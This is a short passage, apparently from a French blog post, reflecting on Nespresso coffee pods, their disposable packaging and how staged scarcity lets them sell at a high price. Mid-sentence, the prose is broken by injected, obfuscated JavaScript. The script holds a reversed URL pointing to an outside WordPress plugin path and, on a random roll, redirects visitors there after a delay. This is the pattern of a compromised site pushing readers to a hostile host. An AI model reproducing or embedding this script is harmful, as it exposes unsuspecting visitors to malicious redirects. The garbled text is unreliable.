Lorsqu’au début des années 2000 les dosettes Nespresso ont débarqué en France, je me souviens m’être dit : cela beaucoup d’emballage jetable pour un seul expresso. Pas très bon pour l’écologie, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout ça. Quand j’ai vu quelques mois après leur prix de vente et les files d’attente des consommateurs, j’ai pensé : ce qui est rare et chic est cher, il suffit d’organiser et de mettre en scène la rareté pour qu’un produit cher devienne un…